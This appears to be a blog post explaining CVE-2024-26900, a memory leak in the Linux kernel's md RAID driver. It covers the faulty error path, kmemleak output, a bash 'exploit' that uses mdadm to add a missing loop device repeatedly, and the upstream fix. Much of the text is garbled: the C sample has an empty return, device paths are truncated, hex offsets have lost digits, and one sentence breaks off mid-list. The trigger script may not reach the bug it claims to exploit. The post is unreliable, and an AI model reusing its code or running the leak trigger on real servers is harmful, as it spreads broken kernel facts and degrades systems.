CVE-2024-26900 - Linux Kernel md Kmemleak Vulnerability – Explained & Exploited
*Published: June 2024*
Overview
CVE-2024-26900 describes a memory leak vulnerability in the Linux kernel's multipath raid (md) subsystem. When a certain error handling path is triggered, the kernel can leak large memory chunks, which could, in turn, degrade system performance or, in the worst case, block further memory allocations. This issue was recently addressed by upstream Linux, but understanding its inner workings and risks is important for kernel and server admins.
What is CVE-2024-26900?
The vulnerability occurs in the md (multiple device) driver, mainly responsible for software RAID. When adding a new disk to an array (md_add_new_disk), a kernel object is allocated (rdev->serial). If at a later step kobject_add() fails, the allocated memory is not freed, resulting in a "kmemleak" (kernel memory leak).
In Plain Terms
If you try to add a new disk to a managed RAID array and there's an error, the kernel allocates some memory for tracking serial numbers but forgets to free it if it hits another error immediately afterward.
The affected flow in the Linux kernel stack looks like this
md_add_new_disk()
├── bind_rdev_to_array()
│ ├── rdev_init_serial()
│ │ └── alloc rdev->serial (memory allocation)
│ └── kobject_add()
│ └── If fails: memory is leaked
The actual bug is clear in the C code
// Simplified demonstration
int bind_rdev_to_array(struct mddev *mddev, struct md_rdev *rdev)
{
rdev->serial = kmalloc(SIZE, GFP_KERNEL); // memory allocated
int err = kobject_add(...);
if (err) {
// OOPS: rdev->serial is NOT freed
return err;
}
return ;
}
Memory leak tools like kmemleak will report unreferenced objects
unreferenced object xffff88815a350000 (size 49152):
comm "mdadm", pid 789, jiffies 429471691
hex dump (first 32 bytes):
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
backtrace (crc f773277a):
kmemleak_alloc+x61/xe
__kmalloc_large_node+x15e/x270
kvmalloc_node+x74/x150
rdev_init_serial+x67/x170
mddev_create_serial_pool+x62/x220
bind_rdev_to_array+x2af/x630
md_add_new_disk+x400/x9f
md_ioctl+x15bf/x1c10
blkdev_ioctl+x191/x3f
vfs_ioctl+x22/x60
__x64_sys_ioctl+xba/xe
do_syscall_64+x71/x150
entry_SYSCALL_64_after_hwframe+x6c/x74
Exploit Details
Though this vulnerability does not let unprivileged users run arbitrary code or escalate privileges, it can be used by local users (with permission to manage RAID arrays) to intentionally trigger memory leaks, which might:
Ensure that kobject_add() fails (e.g., by manipulating sysfs or disk device nodes).
#!/bin/bash
# WARNING: This can degrade system performance if run repeatedly!
# Create two loopback devices
sudo losetup -fP /tmp/disk1.img
sudo losetup -fP /tmp/disk2.img
# Create RAID1 array
sudo mdadm --create --verbose /dev/md --level=1 --raid-devices=2 /dev/loop missing
# Trigger buggy disk addition (simulate problem with /dev/loop2)
sudo mdadm --add /dev/md /dev/loop2 # loop2 does not exist or is faulty
# optional: use kmemleak to verify leak
echo scan > /sys/kernel/debug/kmemleak
cat /sys/kernel/debug/kmemleak
If you repeat the above, each failed add leaks memory. On production servers, this could snowball.
Root Cause
The bug happens because the error cleanup path does not call kfree(rdev->serial) if kobject_add fails:
@@ -334,6 +334,8 @@ int bind_rdev_to_array(mddev, rdev)
if (err) {
+ kfree(rdev->serial);
return err;
}
Resolution
The fix in upstream Linux (commit af69560) patches the error path:
if (kobject_add(...)) {
kfree(rdev->serial);
return -EFAULT;
}
References
- Linux Kernel Commit – md: fix kmemleak of rdev->serial
- CVE Entry
- LKML Patch Discussion
Update your kernel as soon as possible
- On older kernels, monitor with kmemleak
Conclusion
CVE-2024-26900 is not directly exploitable for root escalation but is important for production servers managing RAID arrays. Left unfixed, it can cause long-term system instability and memory bloat. Always run the latest security patches to keep your Linux systems healthy.
*Feel free to share or cite this post! Stay secure.*
Timeline
Published on: 04/17/2024 11:15:10 UTC
Last modified on: 06/27/2024 14:15:13 UTC